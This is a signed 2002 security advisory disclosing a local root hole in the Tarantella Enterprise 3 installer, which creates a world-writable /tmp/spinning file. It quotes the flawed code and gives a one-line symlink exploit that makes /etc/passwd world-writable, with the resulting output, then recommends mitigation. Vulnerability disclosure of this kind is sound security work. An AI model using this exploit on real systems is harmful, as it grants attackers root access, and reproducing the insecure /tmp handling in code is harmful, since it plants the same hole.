-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Larry W. Cashdollar Vapid Labs 2/18/2002 Another local root vulnerability during installation of Tarantella Enterprise 3. During installation a "twirling / \ | - " text graphic is displayed (you remember them from the shareware games in DOS days..) they create a file in /tmp called spinning to determine at what state the installation is at. The files permissions are changed toread write excute for all, removed and recreated during different stages of the installation. It is vulnerabile to a simple symlink attack. Problem Code: <----snip----> touch /tmp/spinning >/dev/null 2>&1 chmod 777 /tmp/spinning >/dev/null 2>&1 <----snip----> Exploit: There is no race condition here, just create the link. [lwc@misery] ln -s /etc/passwd /tmp/spinning Wait until root is done installing... [lwc@misery] ls -l /etc/passwd - -rwxrwxrwx 1 root root 1094 Feb 18 22:39 /etc/passwd Recommendations: I again recommend the target system is running in single user mode before this software is installed. The vendor has been notified and plans to fix this in the next release. http://vapid.dhs.org -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (FreeBSD) Comment: For info see http://www.gnupg.org iD8DBQE8clFP1hSQ6Gxh/KoRAtQWAKCOod+43+rYbvc0pmw2ZnPZ5pDsqwCcD18m w80GBUP5ejW31415uXSVmGg= =U3gs -----END PGP SIGNATURE-----
This archive was generated by hypermail 2b30 : Tue Feb 19 2002 - 11:18:45 PST